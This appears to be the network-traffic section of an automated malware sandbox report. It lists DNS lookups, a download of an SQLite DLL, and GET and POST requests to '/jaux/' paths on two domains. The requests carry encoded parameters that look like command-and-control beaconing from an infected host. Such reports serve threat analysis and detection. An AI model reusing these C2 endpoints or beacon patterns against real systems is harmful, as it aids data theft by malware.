Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.brick2theatercompany.org |
CNAME
brick2theatercompany.org
|
184.154.216.162 |
| www.dwcmy.icu | 107.148.132.109 | |
| www.sqlite.org | 45.33.6.223 |
- UDP Requests
-
-
192.168.56.102:56630 164.124.101.2:53
-
192.168.56.102:62846 164.124.101.2:53
-
192.168.56.102:63709 164.124.101.2:53
-
192.168.56.102:64513 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56633 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.102:123
-
GET
301
http://www.brick2theatercompany.org/jaux/?RA2Ffnn=icakqaRty6vlYpraZuLZDt8iqw6TAXaANP93WqO2tXnG28cx2yzbZzs/HE+K7qwLPazhHRQPHP7+Ft+vCQAGl34EUMiC/bZO7D7RKMw=&gLB=QULU5
REQUEST
RESPONSE
BODY
GET /jaux/?RA2Ffnn=icakqaRty6vlYpraZuLZDt8iqw6TAXaANP93WqO2tXnG28cx2yzbZzs/HE+K7qwLPazhHRQPHP7+Ft+vCQAGl34EUMiC/bZO7D7RKMw=&gLB=QULU5 HTTP/1.1
Host: www.brick2theatercompany.org
Connection: close
HTTP/1.1 301 Moved Permanently
Connection: close
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
x-redirect-by: WordPress
location: http://brick2theatercompany.org/jaux/?RA2Ffnn=icakqaRty6vlYpraZuLZDt8iqw6TAXaANP93WqO2tXnG28cx2yzbZzs/HE+K7qwLPazhHRQPHP7+Ft+vCQAGl34EUMiC/bZO7D7RKMw=&gLB=QULU5
x-litespeed-cache: miss
content-length: 0
date: Wed, 07 Jun 2023 01:28:33 GMT
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
GET
200
http://www.sqlite.org/2017/sqlite-dll-win32-x86-3210000.zip
REQUEST
RESPONSE
BODY
GET /2017/sqlite-dll-win32-x86-3210000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118)
Host: www.sqlite.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Date: Wed, 07 Jun 2023 01:28:38 GMT
Last-Modified: Thu, 18 Jan 2018 20:17:17 GMT
Cache-Control: max-age=120
ETag: "m5a6100cds6cee7"
Content-type: application/zip; charset=utf-8
Content-length: 446183
POST
0
http://www.dwcmy.icu/jaux/
REQUEST
RESPONSE
BODY
POST /jaux/ HTTP/1.1
Host: www.dwcmy.icu
Connection: close
Content-Length: 2081
Cache-Control: no-cache
Origin: http://www.dwcmy.icu
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dwcmy.icu/jaux/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
POST
0
http://www.dwcmy.icu/jaux/
REQUEST
RESPONSE
BODY
POST /jaux/ HTTP/1.1
Host: www.dwcmy.icu
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.dwcmy.icu
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dwcmy.icu/jaux/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
GET
404
http://www.dwcmy.icu/jaux/?RA2Ffnn=dXzChEviWThMepFS/xxtUmXNQtBwn4KvgZ5ardr6ndysj8KT1gjetGIPwrBptW+hnPwvo+gRGgTDVleeJCFvAYnj9Conz55LaaEoVKU=&gLB=QULU5
REQUEST
RESPONSE
BODY
GET /jaux/?RA2Ffnn=dXzChEviWThMepFS/xxtUmXNQtBwn4KvgZ5ardr6ndysj8KT1gjetGIPwrBptW+hnPwvo+gRGgTDVleeJCFvAYnj9Conz55LaaEoVKU=&gLB=QULU5 HTTP/1.1
Host: www.dwcmy.icu
Connection: close
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 07 Jun 2023 09:28:51 GMT
Content-Type: text/html
Content-Length: 566
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts